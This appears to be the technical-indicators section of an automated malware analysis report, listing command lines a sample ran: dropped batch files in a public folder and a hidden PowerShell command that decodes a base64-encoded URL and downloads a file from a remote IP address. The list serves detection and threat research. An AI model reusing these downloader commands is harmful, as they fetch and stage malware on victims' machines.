Technical Information
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\hg32j.bat
- '<SYSTEM32>\cmd.exe' /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzE5Mi45OS4yNTUuNDUvbks0QmtvY1RZN2p6LnBocA==')...
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\kjh4ek\ndj34h.bat
- C:\users\public\hg32j.bat
- C:\users\public\kjh4ek\ndj34h.bat
- http://19#.#9.255.45/nK4BkocTY7jz.php
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\hg32j.bat' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzE5Mi45OS4yNTUuNDUvbks0QmtvY1RZN2p6LnBocA==')...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\kjh4ek\ndj34h.bat' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir C:\Users\Public\kjh4ek
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 50
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 50